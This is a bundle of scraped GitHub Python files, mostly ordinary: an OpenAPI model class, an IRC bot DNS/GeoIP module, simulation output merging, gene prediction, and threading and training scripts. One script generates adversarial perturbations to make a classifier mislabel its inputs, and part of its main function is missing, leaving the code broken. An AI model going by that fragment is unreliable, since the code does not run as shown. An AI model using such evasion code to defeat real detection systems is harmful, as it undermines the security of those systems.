ignore_column_order=True)\n","repo_name":"ONSdigital/cis_households","sub_path":"tests/impute/test_impute_outside_uk_columns.py","file_name":"test_impute_outside_uk_columns.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"67"} +{"seq_id":"74974455574","text":"from __future__ import print_function\r\n\r\nimport copy\r\nfrom sklearn.metrics import f1_score\r\nimport torch\r\nimport torch.nn as nn\r\nimport xlwt\r\n\r\nimport os\r\nimport re\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nfrom utils.utils import get_top_grad_index\r\n\r\n\r\n\r\n\r\npoint_dict = {}\r\n\r\n\r\n\r\n\r\ndef solve_input(raw_path):\r\n x = np.load(raw_path)\r\n x = x.astype(\"float32\")\r\n x = x/255\r\n X = torch.tensor(x)\r\n X = torch.unsqueeze(X,0)\r\n X.requires_grad = True\r\n return X\r\n\r\ncross_loss = nn.CrossEntropyLoss()\r\n#label:int\r\ndef one_file_test(model,data, X,label,iters = 100,alpha=8,num=15,flag=1):\r\n it = 0\r\n new = label\r\n\r\n one_hot_label = torch.nn.functional.one_hot(torch.tensor(label), num_classes= 10)\r\n decay = 0.2\r\n momentum = torch.zeros_like(data)\r\n while(new==label and it15):\r\n break\r\n print(\"done!\")\r\n\r\n\r\ndef statistic_fields(raw_path,num=15):\r\n print(\"------------------statistic_fields-----------------\")\r\n model = torch.load('../train_model/model.pkl')\r\n label_result={}\r\n patten = '[a-zA-Z]+'\r\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)\r\n for file in tqdm(os.listdir(raw_path)): # 对一张图片开始实验\r\n label = re.match(patten, file).group()\r\n int_label = torch.tensor(label_dict[label]).argmax().item()\r\n image_path = raw_path + '/' + file\r\n # preprocess input\r\n image = solve_input(image_path)\r\n image_ = copy.deepcopy(image)\r\n predict = model(image)\r\n if(label not in label_result):\r\n label_result[label]={}\r\n if (predict.argmax() == int_label):\r\n pertubaed_image = one_file_test(model, image ,image_, int_label, num,flag=2)\r\n a = torch.nonzero(pertubaed_image-image)\r\n for i in range(0,len(a)):\r\n temp = tuple(a[i].numpy()[1:])\r\n if(temp in label_result[label]):\r\n label_result[label][temp] = label_result[label][temp]+1\r\n else:\r\n label_result[label][temp] = 1\r\n\r\n for i in label_dict:\r\n sheet = book.add_sheet(i, cell_overwrite_ok=True)\r\n sorted_item = sorted(label_result[i].items(),key=lambda x:x[1],reverse=True)\r\n for j in range(0,10):\r\n sheet.write(j, 0, str(sorted_item[j][0]))\r\n sheet.write(j, 1, str(sorted_item[j][1]))\r\n\r\n book.save(\"union_loss_field.xls\")\r\n return None\r\n\r\n\r\n\r\n\r\nimport time\r\nfrom utils.recode import recode_data\r\nif __name__==\"__main__\":\r\n # Statistics_Field()\r\n raw_path = \"../dataset/npy_dataset/test/facebook_Audio_test8.npy\"\r\n # col = ['k', 'SR', 'AP', 'score(micro)', 'score(macro)','time_cost']\r\n # for i in range(5,16):\r\n # start = time.time()\r\n # rows = more_file_test(raw_path, i)\r\n # rows = list(rows)\r\n # end_time = time.time()\r\n # print(type(rows))\r\n # rows.append(end_time-start)\r\n # recode_data(\"union_loss\",rows,col)\r\n # start = time.time()\r\n # more_file_test(raw_path, 15)\r\n # end_time = time.time()\r\n # print(\"time cost:\",end_time-start)\r\n\r\n # start = time.time()\r\n # statistic_fields(raw_path,15)\r\n # end_time = time.time()\r\n # print(\"time cost:\",end_time-start)\r\n model = torch.load(\"model.pkl\")\r\n data = solve_input(raw_path)\r\n data_copy = copy.deepcopy(data)\r\n x = 
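one_file_test() above is truncated in this record, but its decay/momentum variables suggest a momentum-iterative FGSM-style attack. A generic single step of that update — the loss form and hyperparameters are assumptions for illustration, not the script's values:

import torch

def mi_fgsm_step(model, x, label, momentum, alpha=8/255, decay=0.2):
    # One MI-FGSM step: gradient of the loss w.r.t. the input,
    # L1-normalised, accumulated into a momentum buffer, then a signed
    # step that increases the loss. Start with momentum = torch.zeros_like(x).
    x = x.clone().detach().requires_grad_(True)
    loss = torch.nn.functional.cross_entropy(model(x), label)
    grad, = torch.autograd.grad(loss, x)
    momentum = decay * momentum + grad / grad.abs().sum().clamp(min=1e-12)
    x_adv = (x + alpha * momentum.sign()).detach()
    return x_adv, momentum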
one_file_test(model, data,data_copy, torch.tensor(2),flag=2)\r\n x = torch.reshape(x,(32,32)).detach().numpy()\r\n plt.imshow(x)\r\n plt.show()\r\n","repo_name":"lpf-2001/ad_attack","sub_path":"union_loss/union_loss.py","file_name":"union_loss.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33929272899","text":"# coding: utf-8\n\n\"\"\"\n Conjur\n\n This is an API definition for CyberArk Conjur Open Source. You can find out more at [Conjur.org](https://www.conjur.org/). # noqa: E501\n\n The version of the OpenAPI document: 5.3.0\n Contact: conj_maintainers@cyberark.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom conjur.configuration import Configuration\n\n\nclass LoadedPolicy(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'created_roles': 'object',\n 'version': 'float'\n }\n\n attribute_map = {\n 'created_roles': 'created_roles',\n 'version': 'version'\n }\n\n def __init__(self, created_roles=None, version=None, local_vars_configuration=None): # noqa: E501\n \"\"\"LoadedPolicy - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._created_roles = None\n self._version = None\n self.discriminator = None\n\n if created_roles is not None:\n self.created_roles = created_roles\n if version is not None:\n self.version = version\n\n @property\n def created_roles(self):\n \"\"\"Gets the created_roles of this LoadedPolicy. # noqa: E501\n\n\n :return: The created_roles of this LoadedPolicy. # noqa: E501\n :rtype: object\n \"\"\"\n return self._created_roles\n\n @created_roles.setter\n def created_roles(self, created_roles):\n \"\"\"Sets the created_roles of this LoadedPolicy.\n\n\n :param created_roles: The created_roles of this LoadedPolicy. # noqa: E501\n :type: object\n \"\"\"\n\n self._created_roles = created_roles\n\n @property\n def version(self):\n \"\"\"Gets the version of this LoadedPolicy. # noqa: E501\n\n\n :return: The version of this LoadedPolicy. # noqa: E501\n :rtype: float\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"Sets the version of this LoadedPolicy.\n\n\n :param version: The version of this LoadedPolicy. 
# noqa: E501\n :type: float\n \"\"\"\n\n self._version = version\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, LoadedPolicy):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, LoadedPolicy):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"jodyhuntatx/python_test","sub_path":"py_client/conjur/models/loaded_policy.py","file_name":"loaded_policy.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35850782940","text":"#--depends-on commands\n\nimport re, socket, typing\nfrom src import ModuleManager, utils\nimport dns.resolver\n\nURL_GEOIP = \"http://ip-api.com/json/%s\"\nREGEX_IPv6 = r\"(?:(?:[a-f0-9]{1,4}:){2,}|[a-f0-9:]*::)[a-f0-9:]*\"\nREGEX_IPv4 = r\"(?:\\d{1,3}\\.){3}\\d{1,3}\"\nREGEX_IP = re.compile(\"%s|%s\" % (REGEX_IPv4, REGEX_IPv6), re.I)\n\ndef _parse(value):\n if utils.is_ip(value):\n return value\n return None\n\n@utils.export(\"botset\", utils.BoolSetting(\"configurable-nameservers\",\n \"Whether or not users can configure their own nameservers\"))\n@utils.export(\"serverset\", utils.FunctionSetting(_parse, \"dns-nameserver\",\n \"Set DNS nameserver\", example=\"8.8.8.8\"))\n@utils.export(\"channelset\", utils.FunctionSetting(_parse, \"dns-nameserver\",\n \"Set DNS nameserver\", example=\"8.8.8.8\"))\nclass Module(ModuleManager.BaseModule):\n @utils.hook(\"received.command.dns\", min_args=1)\n def dns(self, event):\n \"\"\"\n :help: Get all addresses for a given hostname (IPv4/IPv6)\n :usage: [type [type ...]]\n :prefix: DNS\n \"\"\"\n args = event[\"args_split\"][:]\n nameserver = None\n if self.bot.get_setting(\"configurable-nameservers\", True):\n nameserver = event[\"target\"].get_setting(\"dns-nameserver\",\n event[\"server\"].get_setting(\"dns-nameserver\", None))\n for i, arg in enumerate(args):\n if arg[0] == \"@\":\n nameserver = args.pop(i)[1:]\n break\n\n hostname = args[0]\n\n record_types = args[1:]\n if not record_types:\n record_types = [\"A?\", \"AAAA?\"]\n\n if not nameserver == None:\n resolver = dns.resolver.Resolver(configure=False)\n resolver.nameservers = [nameserver]\n else:\n resolver = dns.resolver\n\n results = []\n\n for record_type in record_types:\n record_type_strip = record_type.rstrip(\"?\").upper()\n try:\n query_result = resolver.query(hostname, record_type_strip,\n lifetime=4)\n query_results = [q.to_text() for q in query_result]\n results.append([record_type_strip, query_result.rrset.ttl,\n query_results])\n except dns.resolver.NXDOMAIN:\n raise 
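The dns command above builds a dnspython Resolver (optionally with a custom nameserver) and calls query(); dnspython 2.x renamed that to resolve() with the same (name, rdtype) form. A standalone sketch of the lookup:

import dns.resolver

def lookup(hostname, rdtype="A", nameserver=None, lifetime=4):
    # configure=False skips /etc/resolv.conf so the caller's nameserver
    # is the only one consulted, matching the module's behaviour.
    if nameserver:
        resolver = dns.resolver.Resolver(configure=False)
        resolver.nameservers = [nameserver]
    else:
        resolver = dns.resolver.Resolver()
    answer = resolver.resolve(hostname, rdtype, lifetime=lifetime)
    return answer.rrset.ttl, [r.to_text() for r in answer]

# e.g. ttl, records = lookup("example.com", "A", nameserver="8.8.8.8")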
utils.EventError(\"Domain not found\")\n except dns.resolver.NoAnswer:\n if not record_type.endswith(\"?\"):\n raise utils.EventError(\"Domain does not have a '%s' record\"\n % record_type_strip)\n except dns.rdatatype.UnknownRdatatype:\n raise utils.EventError(\"Unknown record type '%s'\"\n % record_type_strip)\n except dns.exception.DNSException:\n message = \"Failed to get DNS records\"\n self.log.warn(message, exc_info=True)\n raise utils.EventError(message)\n\n results_str = [\"%s (TTL %s): %s\" %\n (t, ttl, \", \".join(r)) for t, ttl, r in results]\n event[\"stdout\"].write(\"(%s) %s\" % (hostname, \" | \".join(results_str)))\n\n @utils.hook(\"received.command.geoip\", min_args=1)\n def geoip(self, event):\n \"\"\"\n :help: Get geoip data on a given IPv4/IPv6 address\n :usage: \n :prefix: GeoIP\n \"\"\"\n page = utils.http.request(URL_GEOIP % event[\"args_split\"][0]).json()\n if page:\n if page[\"status\"] == \"success\":\n data = page[\"query\"]\n data += \" | Organisation: %s\" % page[\"org\"]\n data += \" | City: %s\" % page[\"city\"]\n data += \" | Region: %s (%s)\" % (\n page[\"regionName\"], page[\"countryCode\"])\n data += \" | ISP: %s\" % page[\"isp\"]\n data += \" | Lon/Lat: %s/%s\" % (page[\"lon\"], page[\"lat\"])\n data += \" | Timezone: %s\" % page[\"timezone\"]\n event[\"stdout\"].write(data)\n else:\n event[\"stderr\"].write(\"No geoip data found\")\n else:\n raise utils.EventResultsError()\n\n @utils.hook(\"received.command.rdns\")\n def rdns(self, event):\n \"\"\"\n :help: Do a reverse-DNS look up on an IPv4/IPv6 address\n :usage: \n :prefix: rDNS\n \"\"\"\n ip = event[\"args_split\"][0] if event[\"args\"] else \"\"\n if not ip:\n line = event[\"target\"].buffer.find(REGEX_IP)\n if line:\n ip = line.match\n if not ip:\n raise utils.EventError(\"No IP provided\")\n\n try:\n hostname, alias, ips = socket.gethostbyaddr(ip)\n except (socket.herror, socket.gaierror) as e:\n raise utils.EventError(e.strerror)\n event[\"stdout\"].write(\"(%s) %s\" % (ips[0], hostname))\n","repo_name":"bitbot-irc/bitbot","sub_path":"modules/ip_addresses.py","file_name":"ip_addresses.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"67"} +{"seq_id":"16298687549","text":"import os\nimport re\nimport time\nimport shutil\nimport sqlite3\nimport multiprocessing\n\nfrom ADSMSettings.utils import workspace_path, scenario_filename\n\n\nclass CombineOutputsGenerator(multiprocessing.Process):\n import django\n django.setup()\n\n def __init__(self, **kwargs):\n super(CombineOutputsGenerator, self).__init__(**kwargs)\n\n def run(self):\n\n supplemental_location = workspace_path(scenario_filename() + \"\\\\\" \"Supplemental Output Files\" + '\\\\') # Note: scenario_filename uses the database\n scenario_name = scenario_filename()\n db_location = workspace_path(scenario_filename() + \".db\")\n\n combine_outputs(supplemental_location, db_location, scenario_name)\n\n\ndef combine_outputs(supplemental_output_folder, db_location, simulation_name):\n\n all_files = os.listdir(supplemental_output_folder)\n\n states_files = [file for file in all_files if \"states\" in file]\n exposures_files = [file for file in all_files if \"daily_exposures\" in file]\n events_files = [file for file in all_files if \"daily_events\" in file]\n\n output_dir = supplemental_output_folder + \"Combined Outputs\\\\\"\n\n building_dir = True\n while building_dir:\n try:\n os.makedirs(output_dir)\n building_dir = False\n except FileExistsError:\n 
shutil.rmtree(output_dir)\n os.makedirs(output_dir)\n except PermissionError:\n pass\n\n iterations_run = max([len(exposures_files), len(events_files), len(states_files)])\n\n if iterations_run == 0:\n iterations_run = \"UNKNOWN\"\n\n if len(exposures_files) > 0:\n exposure_days = build_exposures(supplemental_output_folder, exposures_files, output_dir)\n else:\n exposure_days = 0\n file = open(supplemental_output_folder + \"/Combined Outputs/\" + \"combined_daily_exposures.csv\", \"w\")\n file.close()\n\n if len(events_files) > 0:\n events_days = build_events(supplemental_output_folder, events_files, output_dir)\n else:\n events_days = 0\n file = open(supplemental_output_folder + \"/Combined Outputs/\" + \"combined_daily_events.csv\", \"w\")\n file.close()\n\n if len(states_files) > 0:\n states_days = build_states(supplemental_output_folder, states_files, output_dir)\n else:\n states_days = 0\n file = open(supplemental_output_folder + \"/Combined Outputs/\" + \"combined_states.csv\", \"w\")\n file.close()\n\n # days_per_iteration = get_days_from_database(db_location)\n # total_outbreak_days = sum(days_per_iteration)\n\n file = open(output_dir + \"/\" + \"combined_metadata.txt\", \"w\")\n\n file.write(\"Simulation Name: \" + simulation_name + \"\\n\")\n file.write(\"\\n\")\n file.write(\"Number of Iterations Run: \" + str(iterations_run) + \"\\n\")\n file.write(\"\\n\")\n file.write(\"Total Number of Lines in Exposures Combined Output: \" + str(exposure_days) + \"\\n\")\n file.write(\"Total Number of Lines in Events Combined Output: \" + str(events_days) + \"\\n\")\n file.write(\"Total Number of Lines in States Combined Output: \" + str(states_days) + \"\\n\")\n '''\n file.write(\"\\n\")\n file.write(\"Total Outbreak Days: \" + str(total_outbreak_days) + \"\\n\")\n file.write(\"Days in each Iteration:\" + \"\\n\")\n for index, iteration in enumerate(days_per_iteration):\n file.write(\"\\t\" + \"Iteration \" + str(index + 1) + \": \" + str(iteration) + \"\\n\")\n '''\n\n file.close()\n\n\ndef get_header(file):\n file = open(file, \"r\")\n header = file.readlines()[0]\n file.close()\n return header\n\n\ndef build_states(in_path, files, out_path):\n header = get_header(in_path + \"/\" + files[0])\n\n data = []\n\n for file in files:\n next_file = open(in_path + \"/\" + file, \"r\")\n new_data = [line.replace(\"\\n\", \"\") for line in next_file.readlines()][1:]\n data += new_data\n\n file = open(out_path + \"/\" + \"combined_states.csv\", \"w\")\n file.write(header)\n for line in data:\n file.write(line + \"\\n\")\n file.close()\n\n return len(data) + 1\n\n\ndef build_exposures(in_path, files, out_path):\n header = get_header(in_path + \"/\" + files[0])\n\n data = []\n\n for file in files:\n next_file = open(in_path + \"/\" + file, \"r\")\n new_data = [line.replace(\"\\n\", \"\") for line in next_file.readlines()][1:]\n data += new_data\n\n file = open(out_path + \"/\" + \"combined_daily_exposures.csv\", \"w\")\n file.write(header)\n for line in data:\n file.write(line + \"\\n\")\n file.close()\n\n return len(data) + 1\n\n\ndef build_events(in_path, files, out_path):\n header = get_header(in_path + \"/\" + files[0])\n\n data = []\n\n for file in files:\n next_file = open(in_path + \"/\" + file, \"r\")\n new_data = [line.replace(\"\\n\", \"\") for line in next_file.readlines()][1:]\n data += new_data\n\n file = open(out_path + \"/\" + \"combined_daily_events.csv\", \"w\")\n file.write(header)\n for line in data:\n file.write(line + \"\\n\")\n file.close()\n\n return len(data) + 1\n\n\n'''\ndef 
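build_states(), build_exposures() and build_events() above each repeat one pattern: keep the first file's header, then append every file's data rows. Factored once:

def combine_csv(paths, out_path):
    # Concatenate per-iteration CSV files into one, writing the header
    # row only once (from the first file).
    with open(out_path, "w") as out:
        for i, path in enumerate(paths):
            with open(path) as f:
                lines = f.readlines()
            if i == 0 and lines:
                out.write(lines[0])
            out.writelines(lines[1:])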
get_days_from_database(database_location):\n\n db = sqlite3.connect(database_location)\n cursor = db.cursor()\n cursor.execute(\n 'SELECT day, last_day, CASE WHEN last_day = \"1\" THEN \"day\" ELSE NULL END AS last_day FROM \"Results_dailycontrols\"'\n )\n daily_controls = cursor.fetchall()\n db.close()\n\n days_list = []\n for item in daily_controls:\n if item[2]:\n days_list.append(item[2])\n return days_list\n'''\n","repo_name":"NAVADMC/ADSM","sub_path":"Results/combine_outputs.py","file_name":"combine_outputs.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"21322596110","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPurpose\n-------\n\nThis module contains functions related with gene prediction\nwith Pyrodigal.\n\nCode documentation\n------------------\n\"\"\"\n\n\nimport pyrodigal\n\ntry:\n from utils import (constants as ct,\n file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\nexcept ModuleNotFoundError:\n from CHEWBBACA.utils import (constants as ct,\n file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\n\n\ndef create_gene_finder(training_data, closed, mask, meta):\n \"\"\"Create a Pyrodigal GeneFinder object.\n\n Parameters\n ----------\n training_data : pyrodigal.TrainingInfo\n A training info instance used to predict genes in single\n mode.\n closed : bool\n True to prevent prediction of partial genes at edges of\n sequences, False otherwise.\n meta: bool\n True to run Prodigal in `meta` mode (uses pre-trained\n profiles).\n\n Returns\n -------\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object configured based on provided arguments.\n \"\"\"\n gene_finder = pyrodigal.GeneFinder(training_info=training_data,\n closed=closed,\n mask=mask,\n meta=meta)\n\n return gene_finder\n\n\ndef train_gene_finder(gene_finder, sequences, translation_table):\n \"\"\"Train a Pyrodigal GeneFinder object based on a set of sequences.\n\n Parameters\n ----------\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object.\n sequences : list\n Sequences used to train the GeneFinder (list\n of bytes objects).\n translation_table : int\n Translation table to use.\n\n Return\n ------\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object configured based on provided arguments.\n \"\"\"\n gene_finder.train(*sequences, translation_table=translation_table)\n\n return gene_finder\n\n\ndef read_training_file(training_file):\n \"\"\"Load training info for Pyrodigal from Prodigal training file.\n\n Parameters\n ----------\n training_file : str\n Path to Prodigal training file.\n\n Returns\n -------\n training_data : pyrodigal.TrainingInfo\n The deserialized training info.\n \"\"\"\n with open(training_file, 'rb') as infile:\n training_data = pyrodigal.TrainingInfo.load(infile)\n\n return training_data\n\n\ndef get_gene_info(contig_id, genome_id, protid, genes):\n \"\"\"Get genes information from a pyrodigal.Genes object.\n\n Parameters\n ----------\n contig_id : str\n The unique identifier of the sequence/contig.\n genome_id : str\n The unique identifier of the genome/file.\n protid : int\n The integer identifier to attriute to the first gene.\n genes : pyrodigal.Genes\n The list of genes predicted by Prodigal.\n\n Returns\n -------\n gene_info : list\n List with one sublist per gene predicted. 
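Pulling the pyrodigal calls above into one tiny driver: meta mode uses pre-trained profiles so no train() call is needed, and find_genes() takes the raw sequence bytes. The gene attributes (begin, end, strand, sequence()) follow this module's own usage:

import pyrodigal

def predict_meta(contig_bytes):
    # meta=True selects Prodigal's pre-trained profiles, so genes can
    # be predicted on a single contig without a training pass.
    finder = pyrodigal.GeneFinder(meta=True)
    genes = finder.find_genes(contig_bytes)
    return [(g.begin, g.end, g.strand, g.sequence()) for g in genes]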
Each sublist\n includes the sequence SHA256 hash, the DNA sequence, the\n genome identifier, the contig identifier, the start position\n in the sequence, the end position, the integer identifier and\n the strand the gene was identified in.\n protid : int\n The integer identifier to attribute to the first gene\n in the next sequence/contig.\n \"\"\"\n gene_info = []\n for gene in genes:\n sequence = gene.sequence()\n sequence_hash = im.hash_sequence(sequence)\n gene_info.append([sequence_hash, sequence, genome_id, contig_id,\n str(gene.begin), str(gene.end), str(protid),\n str(gene.strand)])\n protid += 1\n\n return gene_info, protid\n\n\ndef write_gene_fasta(gene_info, output_file):\n \"\"\"Write a FASTA file based on the results returned by `get_gene_info`.\n\n Parameters\n ----------\n gene_info : list\n List with the data for the genes returned by `get_gene_info`.\n output_file : str\n Path to the output FASTA file.\n \"\"\"\n fasta_sequences = []\n for gene in gene_info:\n fasta_str = ct.FASTA_CDS_TEMPLATE.format(gene[2], gene[6], gene[1])\n fasta_sequences.append(fasta_str)\n fo.write_lines(fasta_sequences, output_file)\n\n\ndef write_coordinates_pickle(gene_info, contig_sizes, output_file):\n \"\"\"Write gene coordinates to a pickle file.\n\n Parameters\n ----------\n gene_info : list\n List with the data for the genes returned by `get_gene_info`.\n contig_sizes : dict\n Dictionary with contig/sequence identifiers as keys and\n contig/sequence size as values.\n output_file : str\n Path to the output file.\n \"\"\"\n gene_coordinates = {}\n for gene in gene_info:\n gene_coordinates.setdefault(gene[0], []).append(gene[2:])\n fo.pickle_dumper([gene_coordinates, contig_sizes], output_file)\n\n\ndef predict_genome_genes(input_file, output_directory, gene_finder,\n translation_table):\n \"\"\"Predict genes for sequences in a FASTA file.\n\n Parameters\n ----------\n input_file : str\n Path to the FASTA file.\n output_directory : str\n Path to the output_directory to store files with\n the results.\n gene_finder : pyrodigal.GeneFinder\n A GeneFinder object.\n translation_table : int\n Translation table used to configure the GeneFinder\n (None type if the GeneFinder does not need to be\n configured).\n\n Returns\n -------\n input_file : str\n Path to the input FASTA file.\n total_genome : int\n Total number of genes predicted.\n fasta_outfile : str\n Path to the output FASTA file that contains the\n predited gene sequences.\n coordinates_outfile : str\n Path to the output pickle file that contains the gene\n coordinates and contig size data.\n \"\"\"\n # Get genome unique identifier\n genome_basename = input_file[1]\n records = fao.sequence_generator(input_file[0])\n records = {rec.id: bytes(rec.seq) for rec in records}\n contig_sizes = {recid: len(sequence)\n for recid, sequence in records.items()}\n\n # Train based on input sequences\n # Only train if object does not contain training info\n # and if it won't run in meta mode\n if gene_finder.training_info is None and gene_finder.meta is False:\n gene_finder = train_gene_finder(gene_finder,\n records.values(),\n translation_table)\n\n # Predict genes for all input contigs\n contig_genes = {}\n for recid, sequence in records.items():\n genes = gene_finder.find_genes(sequence)\n contig_genes[recid] = genes\n\n # Extract data from Gene objects\n protid = 1\n gene_info = []\n for recid, genes in contig_genes.items():\n data = get_gene_info(recid, genome_basename, protid, genes)\n gene_info.extend(data[0])\n protid = data[1]\n\n total_genome = 
len(gene_info)\n fasta_outfile = None\n coordinates_outfile = None\n if total_genome > 0:\n # Create FASTA file with DNA sequences\n fasta_outfile = fo.join_paths(output_directory,\n [f'{genome_basename}.fasta'])\n write_gene_fasta(gene_info, fasta_outfile)\n\n # Save gene coordinates and contig sizes to pickle\n coordinates_outfile = fo.join_paths(output_directory,\n [f'{genome_basename}.coordinates'])\n write_coordinates_pickle(gene_info, contig_sizes, coordinates_outfile)\n\n return [input_file, total_genome, fasta_outfile, coordinates_outfile]\n","repo_name":"B-UMMI/chewBBACA","sub_path":"CHEWBBACA/utils/gene_prediction.py","file_name":"gene_prediction.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"67"} +{"seq_id":"30348304687","text":"n = int(input())\r\ncount = n\r\nk = []\r\nfor i in range(1, n+1):\r\n if count - i <= 0:\r\n if k.count(count) != 0:\r\n p = k.pop()\r\n k.append(count + p)\r\n break\r\n else:\r\n k.append(count)\r\n break\r\n else:\r\n count = count - i\r\n k.append(i)\r\nprint(len(k))\r\nfor i in range(len(k)):\r\n print(k[i], end = \" \")\r\n","repo_name":"TopGitUser/Hello-world","sub_path":"4.1.3.py","file_name":"4.1.3.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14126840586","text":"import numpy as np\nimport torch\nfrom data_loader import data_loading_concept, data_loading_speak\nfrom main_function import feature_extrac, speak_detection\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nConcepts = [\n 'Inner_Brow_Raiser', # AU01 # 00\n 'Outer_Brow_Raiser', # AU02 # 01\n 'Brow_Lowerer', # AU04 # 02\n 'Upper_Lid_Raiser', # AU05 # 03\n 'Cheek_Raiser', # AU06 # 04\n 'Lid_Tightener', # AU07 # 05\n 'Nose_Wrinkler', # AU09 # 06\n 'Upper_Lip_Raiser', # AU10 # 07\n 'Lip_Corner_Puller', # AU12 # 08\n 'Dimpler', # AU14 # 09\n 'Lip_Corner_Depressor', # AU15 # 10\n 'Chin_Raiser', # AU17 # 11\n 'Lip_stretcher', # AU20 # 12\n 'Lip_Tightener', # AU23 # 13\n 'Lips_part', # AU25 # 14\n 'Jaw_Drop', # AU26 # 15\n 'Lip_Suck', # AU28 # 16\n 'Blink' # AU45 # 17\n]\nusers = [\n 'adityarathore', # 00\n 'Caitlin_Chan', # 01\n 'Amy_Zhang', # 02\n 'Anarghya', # 03\n 'aniruddh', # 04\n 'anthony', # 05\n 'baron_huang', # 06\n 'bhuiyan', # 07\n 'chandler', # 08\n 'chenyi_zou', # 09\n 'deepak_joseph', # 10\n 'dunjiong_lin', # 11\n 'Eric_Kim', # 12\n 'FrankYang', # 13\n 'giorgi_datashvili', # 14\n 'Huining_Li', # 15\n 'jonathan', # 16\n 'Kunjie_Lin', # 17\n 'lauren', # 18\n 'moohliton', # 19\n 'phoung', # 20\n 'Tracy_chen' # 21\n]\n\nif __name__ == '__main__':\n data_path = '/mnt/stuff/xiaoyu/data/' # the path where 'x_data.npy' and 'y_data.npy' are located\n model_type = 'LSTM/' # the type of the sub_model\n\n features = [] # the index of feature in target layer for all concepts\n layers = [] # the index of target layer for all concepts\n # features = np.zeros(len(Concepts)) # the index of feature in target layer for all concepts\n # features = features.astype(int)\n # layers = np.zeros(len(Concepts)) # the index of target layer for all concepts\n # layers = layers.astype(int)\n # train all the sub_models for all the concept respectively\n for label_index in range(len(Concepts)):\n x_train, y_train, x_test, y_test = data_loading_concept(label_index, data_path)\n feature_index, max_layer = 
feature_extrac(x_train, y_train, x_test, y_test, label_index, model_type)\n features.append(feature_index)\n layers.append(max_layer)\n\n # since the time cost of the function data_load_speak is too high, we save the outcome into the directory \"data\"\n if not os.path.exists('data/x_train.npy'):\n x_train, y_train, label_train, level_train, x_test, y_test, label_test, level_test = data_loading_speak(data_path)\n np.save('data/x_train.npy', x_train)\n np.save('data/y_train.npy', y_train)\n np.save('data/label_train.npy', label_train)\n np.save('data/level_train.npy', level_train)\n np.save('data/x_test.npy', x_test)\n np.save('data/y_test.npy', y_test)\n np.save('data/label_test.npy', label_test)\n np.save('data/level_test.npy', level_test)\n\n # load the data for speak intent model training and testing\n x_train = np.load('data/x_train.npy')\n y_train = np.load('data/y_train.npy')\n label_train = np.load('data/label_train.npy')\n level_train = np.load('data/level_train.npy')\n x_test = np.load('data/x_test.npy')\n y_test = np.load('data/y_test.npy')\n label_test = np.load('data/label_test.npy')\n level_test = np.load('data/level_test.npy')\n\n # speak intent model training and testing\n speak_detection(x_train, y_train, label_train, level_train, x_test, y_test, label_test, level_test, features, layers, model_type)","repo_name":"zxy340/LSTM_SpeakIntent","sub_path":"LSTM_SpeakIntent/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40133876400","text":"import time\nfrom collections import deque\nfrom queue import Queue\nfrom threading import Lock, Thread\n\nfrom rich import print\nfrom cnp.utils import timer\n\n\nclass MyQueue:\n\n def __init__(self):\n self.items = deque()\n self.lock = Lock()\n\n def put(self, item):\n with self.lock:\n self.items.append(item)\n\n def get(self):\n with self.lock:\n return 